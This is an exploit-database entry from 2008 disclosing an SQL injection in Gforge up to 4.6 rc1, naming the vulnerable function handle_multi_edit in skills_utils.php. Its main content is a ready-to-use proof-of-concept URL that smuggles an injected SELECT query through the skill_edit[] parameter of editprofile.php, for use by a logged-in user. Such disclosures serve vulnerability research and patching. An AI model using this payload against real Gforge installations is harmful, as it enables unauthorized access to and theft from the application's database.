Gforge <= 4.6 rc1 (skill_edit) SQL Injection Vulnerability

2008-10-09T00:00:00
ID 1337DAY-ID-3861
Type zdt
Reporter beford
Modified 2008-10-09T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================================================
Gforge <= 4.6 rc1 (skill_edit) SQL Injection Vulnerability
==========================================================



Gforge <= 4.6 rc1 skill_edit SQL injection

Vendor Notified: 2008-10-06 
Impact: zomg!
Note: should work regardless magic_quotes_gpc setting.
Requires: Creating an account and be logged in
Vulnerable function: handle_multi_edit($skill_ids) on /www/people/skills_utils.php

http://gforge.site/people/editprofile.php?skill_edit[]=1);select+1,2,3,version()+as+title,5,6;+--+&MultiEdit=Edit



#  0day.today [2018-03-14]  #